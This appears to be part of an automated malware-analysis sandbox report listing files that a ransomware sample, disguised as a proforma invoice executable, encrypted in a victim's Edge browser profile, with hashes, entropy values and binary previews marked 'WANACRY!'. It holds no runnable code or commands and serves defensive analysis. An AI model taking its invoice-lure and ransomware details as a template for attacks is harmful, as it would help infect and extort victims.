                                                          Preview:WANACRY!......Z..#i.u..H.dK...:..m......".\..;......"I.......yu}..s3..R.....5...|.da.I...UZ...J!Z...v.GL.C........P.........M[.TD..&;h..x.8U..ma..4.<./.....R.V.xC_.bJk(...m.H.q....2....$D....x.x<.........o........S..B..+.XF ...A4.o..........q.yc.0.D:..,.....v.......r...w..I..!<3E......a.,.c.yjy.....p..O..........r.3....V1y..A.+..E..$.....9....G.<_.....~..;. .qb..GN.\..F J.(c.eKF...+..^..J.c...M..V..v.h.\K.N^.s]S..W.......K.kd.....(8..9.F.z..?m..t.{.6..y..X.N..R......{..u[...*.fl.(;H.e.b.'Sq....I`5............#o.1..8..f<0q..9.........P<..Tv.c..../jP...A...2C........,.@>..y....>."'....P....{..Mk.h.n.Y..y.x..\.L..rq..Z.F..sk......f.*.o..?...WU..o#.Y .......x...<.e@..?...%$gO...L.f.mhE...........x.s..k.m.....z\.a.R...E/...`.|...-..$x.*)u...sw.C,.7...W...Q.%....B....7..HRV...U$\iA...U....Z..Q...B.C...l...+.q7....w...\..@....X.......D.H.......DZ...6..O.|>#\..|u..?..*+.<~...<..>.(......AWm.........d.k..q.....;=@Q..qDn..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\128.png.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5272
                                                          Entropy (8bit):7.961358534276766
                                                          Encrypted:false
                                                          SSDEEP:96:otV9duki3dqJZCAPapLbt2wuKo6yOLIC5PSgbR8grhRfA8Bp0mGpOVhpaC:ii3dqyAiZbtluHpyPSkfx1GpO7D
                                                          MD5:C8AE88A3B27897C1715BCEDEEA9073FB
                                                          SHA1:C4AB1EFEA4550A1444947C050CB4C8C44745AAD3
                                                          SHA-256:02A9299051AB0439A58E5B078EE827FF83686A4A6C42DFD1397FB451FA133C26
                                                          SHA-512:4B3A4ED8A358F647014D8FA901FF72D8BFE3ED6C1E43877D072355E784D0D7BFC85579D46C81AF2F2BB61F826F99A2ACEC682B5F5429B2F70C68CDEA7F926288
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......Z..#i.u..H.dK...:..m......".\..;......"I.......yu}..s3..R.....5...|.da.I...UZ...J!Z...v.GL.C........P.........M[.TD..&;h..x.8U..ma..4.<./.....R.V.xC_.bJk(...m.H.q....2....$D....x.x<.........o........S..B..+.XF ...A4.o..........q.yc.0.D:..,.....v.......r...w..I..!<3E......a.,.c.yjy.....p..O..........r.3....V1y..A.+..E..$.....9....G.<_.....~..;. .qb..GN.\..F J.(c.eKF...+..^..J.c...M..V..v.h.\K.N^.s]S..W.......K.kd.....(8..9.F.z..?m..t.{.6..y..X.N..R......{..u[...*.fl.(;H.e.b.'Sq....I`5............#o.1..8..f<0q..9.........P<..Tv.c..../jP...A...2C........,.@>..y....>."'....P....{..Mk.h.n.Y..y.x..\.L..rq..Z.F..sk......f.*.o..?...WU..o#.Y .......x...<.e@..?...%$gO...L.f.mhE...........x.s..k.m.....z\.a.R...E/...`.|...-..$x.*)u...sw.C,.7...W...Q.%....B....7..HRV...U$\iA...U....Z..Q...B.C...l...+.q7....w...\..@....X.......D.H.......DZ...6..O.|>#\..|u..?..*+.<~...<..>.(......AWm.........d.k..q.....;=@Q..qDn..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80552
                                                          Entropy (8bit):7.99783772904527
                                                          Encrypted:true
                                                          SSDEEP:1536:6L3OM0bbzuAFhR3tlZFZsRANBtdDRyp5CI6PBLShuGgyZRIWCpMzeOZHPDO4:seFuwhR3jNsiBtdMpUah5gMIWsM1V
                                                          MD5:89A10065C72453BB9F24B6733C29B384
                                                          SHA1:B98D9B7F88C4472EB2A96EF181E9010484CF3127
                                                          SHA-256:559D9D41637D626963AA9B2A211D89D5B2ADC893F947C293DFEE109A6B280B7D
                                                          SHA-512:7E22A53F88950D92DF889A53BA360ABE43DC270377B9C7F2F966BAC9AB224A8C2B50040FB1B36ECE8FF79A706C0853FCC2564921FD0EFF4FD391334ED96FAF9C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....X.N...,...........wy..j......X..{.L..E.B................._.td3{..Z...L.Vqy...'....qD;z.1..d..Gt....vT\h....>i......>...F..l]\%E..G...'..L@....Lh8.li=z......-Q..]...l@..JK.....n2D.......#wz../.......%&...6..p.S......G.1.4.rJ..7......@.._.....9........#Q.Op?s4..-.V.p..Y.G...cf..Wn.+.9.YS..>.|.......... Z.[.*k....s.E...q.[.,...Y.4..q'z.O...l..*.....Z.6.yu9.]d^............4.t..v:..0....l9.VpS..V_.W.g..d~.....m.tl.= .Bi..`U.e...o.I..v.d?...{"Y....3.n.D..t.m-d..Z..w..ly..+|T.]......y..8f.$]..q.:.9.!g<....#..A>.b..r......?....\..q..Y...P.F7Gmh...1.1.ua..6.o.*..(.......b..1.TT(....]2..\zQ..7.>....S.... .....I..g.@.9.OMk..c.. ...S.-..u.b../_...Q@._..{.....S".m.ds"!...m.f..O.&....)....M.}............i.'.E./...$...../fx....L.`..3.@5.8...|}>EE.u.N.... 8.>f.4R........,........t....Jg...G.E.l.g..7.@..H..J"^.A.D..."..C...4Y....i.B....f.._.*.e1?.{..Z...........#....Cc...lQ.AC.y....d..C....E.OPY7....Ji.6x.p.J.Cx.C.....D..L.8vv.e.....p..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):80552
                                                          Entropy (8bit):7.99783772904527
                                                          Encrypted:true
                                                          SSDEEP:1536:6L3OM0bbzuAFhR3tlZFZsRANBtdDRyp5CI6PBLShuGgyZRIWCpMzeOZHPDO4:seFuwhR3jNsiBtdMpUah5gMIWsM1V
                                                          MD5:89A10065C72453BB9F24B6733C29B384
                                                          SHA1:B98D9B7F88C4472EB2A96EF181E9010484CF3127
                                                          SHA-256:559D9D41637D626963AA9B2A211D89D5B2ADC893F947C293DFEE109A6B280B7D
                                                          SHA-512:7E22A53F88950D92DF889A53BA360ABE43DC270377B9C7F2F966BAC9AB224A8C2B50040FB1B36ECE8FF79A706C0853FCC2564921FD0EFF4FD391334ED96FAF9C
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....X.N...,...........wy..j......X..{.L..E.B................._.td3{..Z...L.Vqy...'....qD;z.1..d..Gt....vT\h....>i......>...F..l]\%E..G...'..L@....Lh8.li=z......-Q..]...l@..JK.....n2D.......#wz../.......%&...6..p.S......G.1.4.rJ..7......@.._.....9........#Q.Op?s4..-.V.p..Y.G...cf..Wn.+.9.YS..>.|.......... Z.[.*k....s.E...q.[.,...Y.4..q'z.O...l..*.....Z.6.yu9.]d^............4.t..v:..0....l9.VpS..V_.W.g..d~.....m.tl.= .Bi..`U.e...o.I..v.d?...{"Y....3.n.D..t.m-d..Z..w..ly..+|T.]......y..8f.$]..q.:.9.!g<....#..A>.b..r......?....\..q..Y...P.F7Gmh...1.1.ua..6.o.*..(.......b..1.TT(....]2..\zQ..7.>....S.... .....I..g.@.9.OMk..c.. ...S.-..u.b../_...Q@._..{.....S".m.ds"!...m.f..O.&....)....M.}............i.'.E./...$...../fx....L.`..3.@5.8...|}>EE.u.N.... 8.>f.4R........,........t....Jg...G.E.l.g..7.@..H..J"^.A.D..."..C...4Y....i.B....f.._.*.e1?.{..Z...........#....Cc...lQ.AC.y....d..C....E.OPY7....Ji.6x.p.J.Cx.C.....D..L.8vv.e.....p..

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\page_embed_script.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.608795868716206
                                                          Encrypted:false
                                                          SSDEEP:12:bkE6NH/Q4WOPiLx1bQv+6fRCNVHuQe1uuSmyXd2x3MBb4i9:bkKb/bQ26fRCzHut1Cyc+I
                                                          MD5:6179D1BD1D2C5AE54F8873BB57B189BA
                                                          SHA1:3DCA68B33E6B0847ABE13A326E9724953FD34F68
                                                          SHA-256:D3C52BCA7A5F0F26B276C297DBCC3FE2E1E8E845B65D4C762328177A973943B9
                                                          SHA-512:CF625B36D744724DB613D58C8291BB4CC2C31499258CA3A3264DA51BE8F0FEF9EEBE33CDAD57342000A5CB9AF47A5294D21011EB6CC8284DF1FAADBB6F6AA648
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....h*.P.......sJ.Z.L+&..!.....M.4I..ZTR9>F5O.)..Z....".ED*.@.Y....#;...E...y.....]+#..u....dXR..Z[....^(.l5...GT...>.>....N....Xw.75.M..<.C*D.L."O.G.....1..+~..@{R?'.....,.%.?..d...+D.e.G.|#...1..}..!.+...<ge.3....C.^.7.......Z...c?x.......5<........#........m1....s.;uM4o]V..z.'#).OK...>%+.Z-......'.&.r..O..y.......#q......>.*...3.6|.....U..$..t..........#.o..@.R.].p........d..A......yV.d..n..*Q...U..p...[8........:.)d.$....B.A......Z'.f.._P.....,.7....._;.n....#."L.en..5....1f*..2....~..^.^.C..9.~.....x...-..ipyt.`...t...~.4...@/.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\page_embed_script.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):584
                                                          Entropy (8bit):7.608795868716206
                                                          Encrypted:false
                                                          SSDEEP:12:bkE6NH/Q4WOPiLx1bQv+6fRCNVHuQe1uuSmyXd2x3MBb4i9:bkKb/bQ26fRCzHut1Cyc+I
                                                          MD5:6179D1BD1D2C5AE54F8873BB57B189BA
                                                          SHA1:3DCA68B33E6B0847ABE13A326E9724953FD34F68
                                                          SHA-256:D3C52BCA7A5F0F26B276C297DBCC3FE2E1E8E845B65D4C762328177A973943B9
                                                          SHA-512:CF625B36D744724DB613D58C8291BB4CC2C31499258CA3A3264DA51BE8F0FEF9EEBE33CDAD57342000A5CB9AF47A5294D21011EB6CC8284DF1FAADBB6F6AA648
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....h*.P.......sJ.Z.L+&..!.....M.4I..ZTR9>F5O.)..Z....".ED*.@.Y....#;...E...y.....]+#..u....dXR..Z[....^(.l5...GT...>.>....N....Xw.75.M..<.C*D.L."O.G.....1..+~..@{R?'.....,.%.?..d...+D.e.G.|#...1..}..!.+...<ge.3....C.^.7.......Z...c?x.......5<........#........m1....s.;uM4o]V..z.'#).OK...>%+.Z-......'.&.r..O..y.......#q......>.*...3.6|.....U..$..t..........#.o..@.R.].p........d..A......yV.d..n..*Q...U..p...[8........:.)d.$....B.A......Z'.f.._P.....,.7....._;.n....#."L.en..5....1f*..2....~..^.^.C..9.~.....x...-..ipyt.`...t...~.4...@/.....

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\content.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9704
                                                          Entropy (8bit):7.980799888109615
                                                          Encrypted:false
                                                          SSDEEP:192:kRtdPGsniq9YgUqVh+uZIlfog5aukGu+VdaMfLk40Ki3D0yMZHXyH:WPGSvK16HZ6RauD6Mf4f/Yy0HXu
                                                          MD5:8673FB8A0E689499C65EBBFB53C5F86D
                                                          SHA1:3CE46822BB9CD16443B42046E1C4B0F68BFC4E7B
                                                          SHA-256:A8B4C7E40356E8B1527F97B728E8F93DA582109F6818E9237F68C2C5260D97EB
                                                          SHA-512:7AC2EB8B73EC1F117CE0FF2A5D52E371F07FBB436F90470380F459E6C222B76844C819E3874B9C831B9C3BADA85D57EF45E71C537C4CC905DE4891887AF0FBD0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......l..........].S.6.....+..9`....kL0......?tQn.q3.....$....6..)....w....^......+.g.p .....0.b..V<.i.....W.82.."...z.....X.....x.MB.g5.......:.f.K!.....)..&.R>.7....U..|.5...(%..F...f..h......a.%.&.~p).b..~F......-R.x2U=.Zd........|.{..n...vH.L.......$......v.....Qi...f...z.4^.{..X.Ny7qy..3Z.....S...Z=.?3..o.Z6.v(.l|x..}2.6\_.&.E....[..;:....&@.p.`..&. .....f....D....!.U.........Jo.).P..r.cnD5.`D.K.b.....*.cX...d.v....e.!:.I.P..#.kL.].l^...#..q.M.S.WU.g.a....=].Z.....E`).R0.$....n....Y...e>{.......$. ?.r*(r.].8.R^f!...!.l}....#.W..P..Cc.F....'rX.....@...E....k... Gj.......e.[p.W.nOaL....{.Q......C.n...m..\Q.,.i.7q.%.R.d.].:<H..k.....7.../..Ah..h......S..6m..Q.%...c..\X.m.<.9....z..=... B.T..0]......a.]l.....NU...._...h.........7.-...c..\@(.x.. aYcx!R.,.L%...M1...."...+.f...S..!.t........0....^.._...Bu.^q..XFB>#.?HN>C.....?.....).K.0..v......p'..'n.o..Y.D...]~.?R.MU3K:.*.d.E.....5....&}..q.C..u}.m./..=.bh.=.}...72..\t..y..E...o.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\content.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9704
                                                          Entropy (8bit):7.980799888109615
                                                          Encrypted:false
                                                          SSDEEP:192:kRtdPGsniq9YgUqVh+uZIlfog5aukGu+VdaMfLk40Ki3D0yMZHXyH:WPGSvK16HZ6RauD6Mf4f/Yy0HXu
                                                          MD5:8673FB8A0E689499C65EBBFB53C5F86D
                                                          SHA1:3CE46822BB9CD16443B42046E1C4B0F68BFC4E7B
                                                          SHA-256:A8B4C7E40356E8B1527F97B728E8F93DA582109F6818E9237F68C2C5260D97EB
                                                          SHA-512:7AC2EB8B73EC1F117CE0FF2A5D52E371F07FBB436F90470380F459E6C222B76844C819E3874B9C831B9C3BADA85D57EF45E71C537C4CC905DE4891887AF0FBD0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......l..........].S.6.....+..9`....kL0......?tQn.q3.....$....6..)....w....^......+.g.p .....0.b..V<.i.....W.82.."...z.....X.....x.MB.g5.......:.f.K!.....)..&.R>.7....U..|.5...(%..F...f..h......a.%.&.~p).b..~F......-R.x2U=.Zd........|.{..n...vH.L.......$......v.....Qi...f...z.4^.{..X.Ny7qy..3Z.....S...Z=.?3..o.Z6.v(.l|x..}2.6\_.&.E....[..;:....&@.p.`..&. .....f....D....!.U.........Jo.).P..r.cnD5.`D.K.b.....*.cX...d.v....e.!:.I.P..#.kL.].l^...#..q.M.S.WU.g.a....=].Z.....E`).R0.$....n....Y...e>{.......$. ?.r*(r.].8.R^f!...!.l}....#.W..P..Cc.F....'rX.....@...E....k... Gj.......e.[p.W.nOaL....{.Q......C.n...m..\Q.,.i.7q.%.R.d.].:<H..k.....7.../..Ah..h......S..6m..Q.%...c..\X.m.<.9....z..=... B.T..0]......a.]l.....NU...._...h.........7.-...c..\@(.x.. aYcx!R.,.L%...M1...."...+.f...S..!.t........0....^.._...Bu.^q..XFB>#.?HN>C.....?.....).K.0..v......p'..'n.o..Y.D...]~.?R.MU3K:.*.d.E.....5....&}..q.C..u}.m./..=.bh.=.}...72..\t..y..E...o.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\content_new.js.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10056
                                                          Entropy (8bit):7.98340088381614
                                                          Encrypted:false
                                                          SSDEEP:192:WVkUfXYnwRogUKJWe/GndJ+4RLGjT68QyVwhlfLjzOT:WVkUQnKDWe/WO4aWwVwhlj2T
                                                          MD5:2D4EB16D4E08EA9C658B31338FE0D4AC
                                                          SHA1:45D78986F07211577660568AD66C396E662A4D26
                                                          SHA-256:50AF34615D90B497D0AFE06A57C1DA49B60FBCBCD8C7129D166037EDC77B34D8
                                                          SHA-512:51995D3AC44FF7FC5C95E421E8C15D8FB8C37780BE42110B7384A5B77FDA7A4DA8EA4C4A888C9A1F204A85EE39986BAD7CA4555208545088B51000EDBF5FADE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....y.."..H..Nc.dV........:..&..#....l._`{".T..K7.8.A.....k.....Q\cP....W....z...8Z.7..J.^nz..S.f....Z...E...7.U....j....2..s........J.Q..C..H...M..N...6..R`n.o..$..b.......q%.T...'.)ae.0.$......n.3..Wj.2......pr.G.......0S....{;.)..o.{.5.w(u.W....*&........7E...).......a......r...B...j1.....G/+[z'W4.?.U.2...9.K..B.#+K...!D{,.PD~.>....0..@,..p.@..(...|...#7..=Y.."Y.z....p/.V.#......4/4.....a...|..#....F..g...>B..V.J+^.....9..>.R.X..&."..Z.U.......9...^.(a...._..C.U......q...S..b..f......@.v..I...V..y.:z.jB..2.@"..O.<rr..a.p.....@S.M.WL...$:.Z.s...p..3..\s........6..td....[8g.L..u.......}%......mu......%..gn.E.-..`H..s2.c....I.".....q.s<.x^.0.Z.J{E.c.H4&?..........`U.E.#...?c.&.ppN4p[..{N.^.qB.z=..........G.....Mr.T[.tj.r..u6s....32..x...........D.......jKU....o../^3E.ss.>..P`l.}+...-.G"Q.....B.\.t......m...s..P\@Z.J..uj....%.?.f..L...5...u....C...oq0C9.7:R...(8\....`f;....$..g.}_...o.....w..Y...S...[.. .........Y...G......

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\content_new.js.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):10056
                                                          Entropy (8bit):7.98340088381614
                                                          Encrypted:false
                                                          SSDEEP:192:WVkUfXYnwRogUKJWe/GndJ+4RLGjT68QyVwhlfLjzOT:WVkUQnKDWe/WO4aWwVwhlj2T
                                                          MD5:2D4EB16D4E08EA9C658B31338FE0D4AC
                                                          SHA1:45D78986F07211577660568AD66C396E662A4D26
                                                          SHA-256:50AF34615D90B497D0AFE06A57C1DA49B60FBCBCD8C7129D166037EDC77B34D8
                                                          SHA-512:51995D3AC44FF7FC5C95E421E8C15D8FB8C37780BE42110B7384A5B77FDA7A4DA8EA4C4A888C9A1F204A85EE39986BAD7CA4555208545088B51000EDBF5FADE0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....y.."..H..Nc.dV........:..&..#....l._`{".T..K7.8.A.....k.....Q\cP....W....z...8Z.7..J.^nz..S.f....Z...E...7.U....j....2..s........J.Q..C..H...M..N...6..R`n.o..$..b.......q%.T...'.)ae.0.$......n.3..Wj.2......pr.G.......0S....{;.)..o.{.5.w(u.W....*&........7E...).......a......r...B...j1.....G/+[z'W4.?.U.2...9.K..B.#+K...!D{,.PD~.>....0..@,..p.@..(...|...#7..=Y.."Y.z....p/.V.#......4/4.....a...|..#....F..g...>B..V.J+^.....9..>.R.X..&."..Z.U.......9...^.(a...._..C.U......q...S..b..f......@.v..I...V..y.:z.jB..2.@"..O.<rr..a.p.....@S.M.WL...$:.Z.s...p..3..\s........6..td....[8g.L..u.......}%......mu......%..gn.E.-..`H..s2.c....I.".....q.s<.x^.0.Z.J{E.c.H4&?..........`U.E.#...?c.&.ppN4p[..{N.^.qB.z=..........G.....Mr.T[.tj.r..u6s....32..x...........D.......jKU....o../^3E.ss.>..P`l.}+...-.G"Q.....B.\.t......m...s..P\@Z.J..uj....%.?.f..L...5...u....C...oq0C9.7:R...(8\....`f;....$..g.}_...o.....w..Y...S...[.. .........Y...G......

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.990350577990723
                                                          Encrypted:true
                                                          SSDEEP:384:hBGPdIBVLYiVAqwaPAhv9gZbRXHDdxNeiLq:HGPdvQLUv9gZbdjH3u
                                                          MD5:CF0ABE86C13D676235395041F7033A3C
                                                          SHA1:EBDBE3A0D67E3410029D4C161B5C12F7C530926A
                                                          SHA-256:38085F57A90343FB7AA15999697F1A36DCAF70D5342A29FD5851DFDBFD8A5CBB
                                                          SHA-512:7FBD886817F604107E03A92AD6610CB4F16C01C0EA5CBDD1C0D130AAAA75CC85848E07AF508F7F85314BC0904818D6BF2D83E65D6ECBF1A6BA19E500433A548A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........mD..?x.7U.....M......:.~....W...}.7?..?4_..C.=.DC.../[.v.....s.M>.!k.....y..+.~.L.N..<s..y..i...@{.....5.]...~:....n...)W)oq/T.....]..#Go...S....p.HO..O.Z.......7.-..q.1.....!.'.,M.~.o.2.....2AX<..u....e.."0r...r.?._(..w.e~T.e.fT.G.0*........@...........q...F.}..!....7a.$...........x.t_.^..~.{'..t.B..P..."x.b..:......,\.6.....|.+....`..K...}R...H@./.n..k....O.c.o..-.I..*O.`..b..5.{..I..o....../....[..~"...fLkS.A.....t3..........k.w[iB....K..w.r..6I....:U.........=M.... ;L...s...j..KO ...a./.QI{..W.G......_.....C.x..&...w6....&...V).F.~e[!.....v._11O{b...d1?.K.*q....mc.;..<..p.g.\...i6k.Y..x...h%.;...$Q.f...~.j...S..`..;d..RBkW.n.Y.7?..7..t.A..W0.O.7h..n.@......>.]....v1...P/..F=<......6,..*F...aR...._Fwh.._..q.h&.....i.."=4..[.N.w.,v..J.e...s\!.....P..3.....}.+i...i..$.M..c..'..<..1eb2.`...)..X..}A.L...4.K..z.0....>=......U.3..J.8e.9.D"...*.A....4.Wj,O~.lT.....Q.3.4...q...8.g.....3!...N....N~Rz!..f..wd...~_..u.f.So..U..{

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.990350577990723
                                                          Encrypted:true
                                                          SSDEEP:384:hBGPdIBVLYiVAqwaPAhv9gZbRXHDdxNeiLq:HGPdvQLUv9gZbdjH3u
                                                          MD5:CF0ABE86C13D676235395041F7033A3C
                                                          SHA1:EBDBE3A0D67E3410029D4C161B5C12F7C530926A
                                                          SHA-256:38085F57A90343FB7AA15999697F1A36DCAF70D5342A29FD5851DFDBFD8A5CBB
                                                          SHA-512:7FBD886817F604107E03A92AD6610CB4F16C01C0EA5CBDD1C0D130AAAA75CC85848E07AF508F7F85314BC0904818D6BF2D83E65D6ECBF1A6BA19E500433A548A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........mD..?x.7U.....M......:.~....W...}.7?..?4_..C.=.DC.../[.v.....s.M>.!k.....y..+.~.L.N..<s..y..i...@{.....5.]...~:....n...)W)oq/T.....]..#Go...S....p.HO..O.Z.......7.-..q.1.....!.'.,M.~.o.2.....2AX<..u....e.."0r...r.?._(..w.e~T.e.fT.G.0*........@...........q...F.}..!....7a.$...........x.t_.^..~.{'..t.B..P..."x.b..:......,\.6.....|.+....`..K...}R...H@./.n..k....O.c.o..-.I..*O.`..b..5.{..I..o....../....[..~"...fLkS.A.....t3..........k.w[iB....K..w.r..6I....:U.........=M.... ;L...s...j..KO ...a./.QI{..W.G......_.....C.x..&...w6....&...V).F.~e[!.....v._11O{b...d1?.K.*q....mc.;..<..p.g.\...i6k.Y..x...h%.;...$Q.f...~.j...S..`..;d..RBkW.n.Y.7?..7..t.A..W0.O.7h..n.@......>.]....v1...P/..F=<......6,..*F...aR...._Fwh.._..q.h&.....i.."=4..[.N.w.,v..J.e...s\!.....P..3.....}.+i...i..$.M..c..'..<..1eb2.`...)..X..}A.L...4.K..z.0....>=......U.3..J.8e.9.D"...*.A....4.Wj,O~.lT.....Q.3.4...q...8.g.....3!...N....N~Rz!..f..wd...~_..u.f.So..U..{

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4376
                                                          Entropy (8bit):7.949783899265672
                                                          Encrypted:false
                                                          SSDEEP:96:ohgdwPte+qCCNTrGQlsvld2WCqtl9O52flXtF:egdRqwGQsld2WzlvXtF
                                                          MD5:EDA10111FC50AD4D48E49DDF76F3BA1E
                                                          SHA1:A8BF4C5CCA07BE5759BA456B102BF216C49007E8
                                                          SHA-256:E4019510F816D1FE105993B8AF6C1CA4AB2E6F77E899E3077F51EAD6967C6DA4
                                                          SHA-512:87708140DF158324CBFB67A13A83912AF9A8CA568DB34C9548D4EF71FC0BC71967FC56EFB5D44A506FA45ACF2595A1F19D76300D4F0360684D0D448B5F149E59
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......$....F[+$...Y...4.6o6..'..~'...Z..3Fg?{..6........O[..YX.6....\....t.N.....WF.+.'..KV...''.d..yk....B(8..)9...W.2Qs....U/g...)K"{..........|......U.....Kn.-....84..c......-.|./b..1.i8.....b.F...{...t.xT.F.......<.....zE~J..07B.PPA....t.;..............S.N...|8(z....D...7..r}2...N...w./......0.f.....S.{$...A(_m..si..Q.b=..xr|Lh^...Ff.?...."..i .s._..Q...b..jg...<.F...>.......]..Y..i..98... ....N.^.-...]..L.O..Pr..X.>.$).2.........x-L._._..}.4.........z..#.W.33++x.[.4.[<...;.....i....w.....BW.6.E......S..x..."m.....:./P..-.=._............W..*.K0.KQ...V..%.W..%z......._r9..!...p.f...J.dG...%.h.}i.6.X>....8..~..&.G..O..a.....6.00..8.iv.V.<..oF..g.ms....3.f.G.n.'..G1..".Ga._g....&U.L..X.......G.O}.^.e.. ...s..e..U.I+.l.......1.....Q....M..wd...d-..\..0...n..@.#.....:f3)T...yB.E.Z.%.%...f.T..kE:.....k.e..+...%.)..%.......n!.Y.v..(..e...o.+7..B.{....].......H...X.2.4..u...Y.c....)f....MY..........(/.....+>9..C).s$F...e]..e.}..&.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4376
                                                          Entropy (8bit):7.949783899265672
                                                          Encrypted:false
                                                          SSDEEP:96:ohgdwPte+qCCNTrGQlsvld2WCqtl9O52flXtF:egdRqwGQsld2WzlvXtF
                                                          MD5:EDA10111FC50AD4D48E49DDF76F3BA1E
                                                          SHA1:A8BF4C5CCA07BE5759BA456B102BF216C49007E8
                                                          SHA-256:E4019510F816D1FE105993B8AF6C1CA4AB2E6F77E899E3077F51EAD6967C6DA4
                                                          SHA-512:87708140DF158324CBFB67A13A83912AF9A8CA568DB34C9548D4EF71FC0BC71967FC56EFB5D44A506FA45ACF2595A1F19D76300D4F0360684D0D448B5F149E59
                                                          Malicious:false
                                                          Reputation:unknown
